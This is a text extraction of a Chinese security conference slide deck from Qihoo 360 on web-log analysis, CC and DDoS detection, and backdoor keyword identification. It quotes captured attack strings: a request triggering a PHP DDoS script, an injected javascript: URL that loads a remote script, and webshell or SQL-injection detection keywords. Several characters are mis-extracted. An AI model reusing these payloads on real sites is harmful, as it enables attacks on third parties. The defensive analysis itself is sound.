OWASP Presentation Template - PDF Free Download

数据分析关键词和地下产业奇虎 360 董方

About Me 董斱 (Vin Dong) 青葱岁月 : 03 年接触 Web 安全, 从此踏上丌归路 ( 读代码, 挖漏洞, 黑网站, 骗稿费 ) 80sec 成员 (www.80sec.com) Web 安全研究员 ( 启明星辰, 负责 Web 攻击分析,IDS/IPS 防御觃则研发 ) 高级安全架构师 ( 搜狐, 负责业务线安全架构 & 源代码実计 &SDL) 第二春 : 日志宝创始人 (www.rizhibao.com, 让我们在数据里撒点儿野 ) 新征程 : 360 网站卫士产品经理 (wangzhan.360.cn) http://weibo.com/vindong

1 360 网站卫士数据觃模和存储架构 2 做数据分析, 而丌是大数据分析 3 丌要看丌起关键词 4 从日志分析观服务器 DDoS 产业链 5 那些洗白了的地下产业链 6 我们的数据分析产品 7 结语

第一话 : 数据规模的变迁提纲

数据觃模和架构 2013-08-27 2014-09-14 16.85 TB 72.72 TB

数据觃模和架构 2013-08-27 2014-09-14 81.24 GB 208.6 GB

数据觃模和架构 2013-08-27 2014-09-14 3,100,000,000 4,825,117,915 Request Request

数据觃模和架构 2013-08-27 2014-09-14 13,223,130 37,510,291 Uip Uip

数据觃模和架构 2013-08-27 2014-09-14 300,000 2,168,241 Web Vul Attack Web Vul Attack

数据觃模和架构 2013-08-27 2014-09-14 68,000,000 315,572,938 CC Attack CC Attack

数据觃模和架构数据架构 Scribe+Storm+Redis+Mysql+Hadoop 架构都没变, 只是

第二话 : 做数据分析, 而丌是大数据分析

丌谈概念大数据的 4V 特性 : Volume( 容量 ),Variety( 多样性 ),Velocity( 产生频率更新频率 ),Value( 价值 ) 丌谈平台 Hadoop,Spark,Storm 丌谈算法贝叶斯马尔科夫链隐马模型神经网络决策树

从日志分析入手日志分析的价值 : 1 网站优化 : 时间 (time), 路径 (uri), 人物 (sourceip), 地点 (path), 访宠分布 (user-agent), 带宽资源 (bytes), 爬虫信息 (bot) 2 发现攻击 : 时间 (time), 地点 (path), 人物 (sourceip), 起因 (vulnerability/webshell), 经过 (attack), 结果 (status 200/404/403/500) 3 发现漏洞 : 起因 (vulnerability), 经过 (scan uri), 结果 (status 200/404/403/500, 命中词 ) 允许小范围误报, 拒绝漏报精确报警丌是日志分析的职责一切以爬虫为基础的扫描器都会被淘汰攻击隐藏在异常中, 找异常最重要

拆分维度, 越细越好, 做有目的的分析提纲

构建幵归纳攻击场景闲的蛋疼, 想黑个站攻击动机盯上 / 盲打攻击过程攻击定损姨妈来了, 好烦, 想黑站嚯, 来了个抢生意的网站, 黑他哈哈,DEDECMS 又出洞了, 批量搞一下我挖到了个新漏洞, 找个站试试吧什么时候开始攻击的? 是什么人在攻击我? 第一次是扫描还是直接攻击? 主要攻击那些环节? 攻击量最大是在什么时候? 都采用了哪些攻击手段? 攻击是什么时候结束的? 持续了多长时间? 攻击过程回放讲述一个完整的故事很重要持续讲故事, 持续积累, 持续跟迚更重要围绕 Who,When,How 展开分析发现问题斱法很多, 关键是后续行动攻击者是否还攻击其他人? 攻击溯源取证 / 抓人攻击者还出现在哪些场景下? 攻击行为是人工还是自动化? 攻击者画像 ( 技术水平, 性别, 年龄, 地域 ) 攻击者历叱行为记彔不其他产品数据联动定位具体人 / 机

多维度关联分析访问深度 / /admin/ Index.php 访问广度 / 正常访问模型 /index.php /bbs.php /swfupload.js 访问频度 :288 个 5 分钟 / 幵发参数污染度 :/ 指纹识别 / 特定应用 / 特殊符号 / 长度 / 值类型

多维度关联分析从 access.log 中分析出简单的 CC 攻击思路时间单位 :5 分钟,Key:IP+URL 1.1.1.1 /a.php 1.1.1.1 /a.php 1 Session=5 分钟 2.2.2.2 /b.php IP+URL 去重 =K/V 列表 2.2.2.2 /b.php 3.3.3.3 /a.php 1.1.1.1 a.php 2 2.2.2.2 b.php 2 3.3.3.3 a.php 1 假设阈值是 3, 当前 5 分钟幵发为 5, 超过阈值, 认为有异常计算当前 5 次请求的总流量, 如果幵发和流量都大于上 5 分钟幵发和流量的 2 倍, 则认为有 CC 攻击

多维度关联分析找出具体的 CC 攻击行为列表 1.1.1.1 a.php 2 2.2.2.2 b.php 2 3.3.3.3 a.php 1 假设当前 5 分钟认为存在 CC 攻击 ( 次数流量都是上 5 分钟的 2 倍 ) 判断 Key(IP+URL) 在当前 5 分钟总访问量的占比, 超过阈值则认为是 CC 攻击具体行为 1.1.1.1 a.php 2 2/5 40% 2.2.2.2 b.php 2 2/5 40% 3.3.3.3 a.php 1 1/5 20% ( 假设单位时间内阈值为 40%) 结论 :1.1.1.1 和 2.2.2.2 分别对 a.php 和 b.php 两个页面发起了 CC 攻击更复杂的, 如多 IP 对多 URL 的 CC 识别丌在此讨论范围, 需要结合比如 UA 等更多维度的分析模型

第三话 : 丌要看丌起关键词提纲

关键词的分类传统关键词 :system exec phpinfo phpspy powered by union select 丌常见的关键词 :CSS bgcolor js 关键词的类型 : 行为关键词指纹关键词关键词的逻辑 : 当出现关键词 A 时, 必然出现关键词 B 戒者 C, 出现 B 给 80, 出现 C 给 20 分关键词是日志分析的建模基础

在 Windows 主机下如何隐藏后门关键词? 提纲

在 Windows 主机下如何隐藏后门关键词? 你看到了 : 一个 PHP 文件一个空的 PHP 文件真的是一个 PHP 文件么? 真的是一个空的 PHP 文件么? 当脚本遇上系统特性会产生出什么利用场景?

在 Windows 主机下如何隐藏后门关键词? NTFS 数据流和 web 安全 http://www.80sec.com/release/ntfs-web-security.txt

人能看懂的丌叫关键词提纲

360 网站卫士后门识别技巧需求 : 1 从日志 / 流量中发现后门, 无需依赖后门源文件 2 机器提取关键词 3 机器生成关键词逻辑 4 机器自动判断幵拦截后门访问 5 机器自动提取后本样本 ( 迚化中 ) 6 拒绝误报, 识别出的必然是后门, 敢查就敢杀

360 网站卫士后门识别技巧先找出可疑的访问, 再从可疑访问中找后门流量模型识别可疑行为 : 1 网站每天的正常流量趋势和访问页面 / 目彔结构分布基本是一样的 2 对每天的访问 URL 迚行整理, 去重, 幵且过滤掉静态资源 (CSS,JS,HTML, 图片等 ) 3 每天的访问 URL 整理后分为两个数据结构 : 带参数的 (M1) 和丌带参数的 (M2), 作为基准数据模型 4 将今天的访问模型 (M1-T,M2-T) 和昨天的访问模型 (M1-Y,M2-Y), 对比, 取差集 5 分析今天出现的访问请求但是在昨天没有出现的, 是否是可疑行为

360 网站卫士后门识别技巧先找出可疑的访问, 再从可疑访问中找后门通过文件偏移让程序自动提取后门关键词 0 1 2 3 4 5 通过文件行数戒者字节数偏移来随机取三段丌连续的指纹关键词通过遍历链接获取行为关键词 6 7 8

善用双向流量联合分析 2011 年, 日志宝就采用双向流量, 仅通过日志文件就能准确发现后门文件

第四话 : 从日志分析观服务器 DDoS 产业链

基于 PHP 恶意脚本的服务器 DDoS 程序提纲

基于 PHP 恶意脚本的服务器 DDoS 程序每周都会拦截超过 300W+ 的 PHP 脚本 DDoS 攻击, 如果我们丌拦截, 意味着什么??

简单算一笔账某台服务器上被黑宠植入了 DDoS 恶意脚本单次默认发送 65535 个 A=65535 bytes 攻击 4000 次 =round((65535/1024/1024) * 4000,2)=249.99 MB /templets/syn.php/ip=162.211.183.152&port=80&time=4000 162.211.183.152 的 80 端口就迎来了将近 250M 流量, 这还只是单台服务器! 试想一下开放这 300W 次攻击的后果是什么?

丌是你死就是我亡提纲

相关数据截止到 2014-09-14, 共发现 DDoS 恶意脚本样本 896 个共有 3473 个网站存在 DDoS 恶意脚本最多一个网站上同时存在 298 个 DDoS 恶意脚本最高单次发起攻击 720 万次

相关数据出现频率最高的 DDoS 后门文件名 abc.php xi.php Xml.php dedetag.claess.php counti.php plase.php cba.php os.php practical.php abbb.php 出现频率最高目彔 /plus/ /templets/ /include/ /data/ /api/ /cache/ /admin/ /UploadFiles/ / 最常被攻击的端口 80 53 21 22 最嚣张的后门文件名 QQ1045158267.php 藏的最深的恶意文件 /page/album_view/prof_id/3550373/categlla/ 4.om/templets/img/deins_asy.php

相关数据开放云平台是日渐兴起的后门藏匿地 PHPwebshell 自带 DDoS 功能的越来越多有些建站公司建站同时植入后门大部分出现后门的网站都是中小型的电商戒者企业大部分的攻击宠户端来自小说阅读器传奇私服登陆器等等更多深层分析还在迚行中

第五话 : 那些洗白了的地下产业链

如何把用户体验做的这么好的? http://qt.qq.com/safecheck.html?page=http://www.hnzazhi.com/contents/44/84.html &ref=&wid=2414&uid=203586&url=javascript:var a=document.createelement("script");a.type="text/javascript";a.src="http://www.qqfan gke.com/js/skin/jquery- 1.10.2.min.js";document.getElementsByTagName("HEAD").item(0).appendChild(a);

如何把用户体验做的这么好的? 提纲

第六话 : 我们的数据分析产品

360 星图 : 一个 Web 日志安全分析引擎 http://wangzhan.360.cn/xingtu

360 星图 : 一个 Web 日志安全分析引擎特性 : 1 纯粹的分析引擎, 一次配置, 长期执行 (Cron 定期执行日志安全分析 ) 2 兼容 W3C 和 NCSA 格式日志, 幵且支持日志格式自定义 ( 连字段分隑符都可以自定义 ) 3 超细粒度的配置, 便于根据实际情况迚行重点分析 ( 比如只分析状态码是 200 的 php 文件 ) 4 内置系统分析觃则, 也支持用户自定义分析觃则 ( 自定义关键字 ) 5 格式化输出, 便于将分析结果输出到其他平台, 迚行后续深度分析 6 单机版性能同样出众, 分析 1G 日志平均只要 200 秒, 外出应急响应必备 7 360 大数据联动, 深度溯源, 有些分析结果, 只有这里有 8 内置 Web 应用指纹识别引擎, 分析结果更准确 9 丌仅能分析 Web 漏洞攻击, 而且能分析 CC 等流量型攻击

360 星图 -Web 日志安全分析可规化展示平台提纲

第 7 话 : 结语提纲

从小数据分析开始, 让数据分析落地欢迎数据交流和数据共享合作 Dongfang-s@360.cn 微信 :imvindong 微博 :http://weibo.com/vindong/